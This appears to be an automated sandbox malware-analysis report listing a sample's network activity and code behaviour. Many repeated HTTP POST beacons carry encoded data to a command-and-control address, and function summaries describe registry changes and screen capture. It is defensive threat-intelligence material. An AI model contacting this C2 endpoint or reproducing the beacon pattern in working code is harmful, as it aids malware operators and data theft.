                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004105B0 Sleep,Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,3_2_004105B0
                Source: unknownHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.php
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.php)-
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.php-
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.php0
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpD
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpE
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpJ
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpK
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpV
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpW-;
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpXNtM2ZDgETkWRZnZWM=
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpZ-
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpb
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpd
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpdK
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phped
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phped/
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpedY
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpj
                Source: RegSvcs.exe, 00000003.00000002.4127608803.0000000001473000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpl
                Source: RegSvcs.exe, 00000003.00000002.4127608803.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpmmon
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpn-
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpq
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpw
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpx
                Source: powershell.exe, 00000000.00000002.1864550591.00000296DC2DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000000.00000002.1840009085.00000296CD63F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000000.00000002.1840009085.00000296CBA71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
                Source: powershell.exe, 00000000.00000002.1840009085.00000296CD403000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 00000000.00000002.1840009085.00000296CD63F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000000.00000002.1840009085.00000296CBA71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000000.00000002.1840009085.00000296CD63F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000000.00000002.1840009085.00000296CCC64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000000.00000002.1864550591.00000296DC2DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000000.00000002.1840009085.00000296CD403000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                Source: powershell.exe, 00000000.00000002.1840009085.00000296CD403000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004061F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,3_2_004061F0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAACF3C0_2_00007FFD9BAACF3C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004061F03_2_004061F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040B7003_2_0040B700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004460F43_2_004460F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043D1693_2_0043D169
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004051A03_2_004051A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004443473_2_00444347
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004054503_2_00405450
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042B7C03_2_0042B7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042F9DB3_2_0042F9DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043C9DD3_2_0043C9DD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DB583_2_0045DB58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DB7C3_2_0045DB7C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DB103_2_0045DB10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DBDC3_2_0045DBDC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DBD83_2_0045DBD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DBE43_2_0045DBE4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DBE03_2_0045DBE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DBEC3_2_0045DBEC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DBE83_2_0045DBE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DBF43_2_0045DBF4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DBF03_2_0045DBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DBFC3_2_0045DBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DBF83_2_0045DBF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DB843_2_0045DB84
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DB803_2_0045DB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DB8C3_2_0045DB8C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DB883_2_0045DB88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DB943_2_0045DB94
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DB903_2_0045DB90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DB9C3_2_0045DB9C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DB983_2_0045DB98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045DBA03_2_0045DBA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045CE783_2_0045CE78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0045CE7B3_2_0045CE7B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00404EF03_2_00404EF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00432F203_2_00432F20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00445FD43_2_00445FD4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0042A870 appears 56 times
